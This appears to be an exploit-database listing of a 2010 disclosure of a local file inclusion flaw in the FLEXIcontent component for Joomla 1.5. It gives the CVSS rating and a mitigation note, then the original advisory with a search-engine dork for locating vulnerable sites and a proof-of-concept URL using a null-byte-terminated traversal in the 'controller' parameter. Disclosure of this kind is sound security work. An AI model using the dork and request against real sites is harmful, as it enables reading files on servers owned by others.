header-logo
Suggest Exploit
vendor:
FLEXIcontent
by:
eidelweiss
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: FLEXIcontent
Affected Version From: FLEXIcontent 1.5 stable
Affected Version To: FLEXIcontent 1.5 stable
Patch Exists: NO
Related CWE: N/A
CPE: a:flexicontent:flexicontent
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla!
2009

Joomla Component Local File Inclusion Vulnerability

FLEXIcontent is primarily an advanced content management system developed to replace the native article manager of Joomla! 1.5 (com_content). It adds the professional features required to build a collaborative web publishing system. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal strings (“../”) to the vulnerable application. This will allow the attacker to include a remote file from the web server.

Mitigation:

Ensure that user input is validated and filtered before being used in file operations. Also, ensure that the web server is configured to deny access to files outside of the web root directory.
Source

Exploit-DB raw data:

##################################################################
Joomla Component com_flexicontent Local File Vulnerability
##################################################################
 
[+]Title:	Joomla Component Local File Inclusion Vulnerability
[+]Version:	com_flexicontent (FLEXIcontent 1.5 stable)
[+]Download:    http://www.flexicontent.org/downloads/latest-version.html
[+]Author:  eidelweiss
[+]Contact: eidelweiss[at]cyberservices[dot]com    
 
    [!]Thank`s To: JosS , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber , exploit-db team & all friends
 
########################################################
Description:

FLEXIcontent is primarily an advanced content management system developed to replace the native article manager of Joomla! 1.5 (com_content)

It adds the professional features required to build a collaborative web publishing system. Even if it’s not its primary purpose, it can also manage records by presenting them the way of a directory.

Thus, FLEXIcontent was designed to manage content in a broad sense, and can organise articles, image or video galleries, job offers, product catalogues, business directories, a.s.o. within a single user interface.

This means for the end user, unparalleled simplicity of use, everything happens in one place. Mastering 10 components to be able to administrate an entire website isn’t required anymore. For the web designer it means also the end of the headaches for the maintenance and updates of all installed extensions.

FLEXIcontent is an extension for Joomla! developed in 1.5 native mode and complying with the naming and coding conventions of the Framework (MVC frontend and backend). Thus, its portability to future versions will be greatly facilitated. 
########################################################

	-=[Unique Dork => inurl:index.php/option?com_flexicontent]=-
    
 
    -=[ Exploit ]=-

	http://127.0.0.1/index.php?option=com_flexicontent&controller= [lfi]%00
 
####################=[E0F]=####################


								
															[D]eal [C]yber 04/12/2010 GMT+7

Navigation

Suggest Exploit

Services By CQR